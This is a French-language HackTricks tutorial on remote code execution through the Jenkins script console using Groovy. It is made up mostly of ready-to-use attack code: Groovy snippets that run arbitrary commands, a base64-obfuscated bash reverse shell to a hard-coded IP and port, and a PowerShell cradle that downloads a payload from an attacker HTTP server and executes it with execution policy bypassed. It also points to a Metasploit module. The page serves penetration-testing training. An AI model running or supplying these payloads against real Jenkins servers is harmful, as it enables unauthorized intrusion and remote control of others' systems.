HackTricks CloudJenkins RCE avec un script Groovy
Tip
Apprenez & pratiquez AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Soutenez HackTricks
- Consultez les subscription plans!
- Rejoignez le đŹ Discord group ou le telegram group ou suivez-nous sur Twitter đŠ @hacktricks_live.
- Partagez des hacking tricks en soumettant des PRs aux HackTricks et HackTricks Cloud github repos.
Jenkins RCE avec un script Groovy
Câest moins bruyant que de crĂ©er un nouveau projet dans Jenkins
- Allez Ă path_jenkins/script
- Dans la zone de texte, introduisez le script
def process = "PowerShell.exe <WHATEVER>".execute()
println "Found text ${process.text}"
Vous pouvez exécuter une commande en utilisant : cmd.exe /c dir
Dans linux, vous pouvez faire : "ls /".execute().text
Si vous devez utiliser des guillemets et des apostrophes Ă lâintĂ©rieur du texte. Vous pouvez utiliser âââPAYLOADâââ (triple guillemet) pour exĂ©cuter le payload.
Un autre script groovy utile est (remplacez [INSERT COMMAND]) :
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Shell inversée sous Linux
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Reverse shell sous Windows
Vous pouvez prĂ©parer un serveur HTTP avec un PS reverse shell et utiliser Jeking pour le tĂ©lĂ©charger et lâexĂ©cuter :
scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>
Script
Vous pouvez automatiser ce processus avec ce script.
Vous pouvez utiliser MSF pour obtenir un reverse shell :
msf> use exploit/multi/http/jenkins_script_console
Tip
Apprenez & pratiquez AWS Hacking:
Apprenez & pratiquez GCP Hacking:
Apprenez & pratiquez Az Hacking:Soutenez HackTricks
- Consultez les subscription plans!
- Rejoignez le đŹ Discord group ou le telegram group ou suivez-nous sur Twitter đŠ @hacktricks_live.
- Partagez des hacking tricks en soumettant des PRs aux HackTricks et HackTricks Cloud github repos.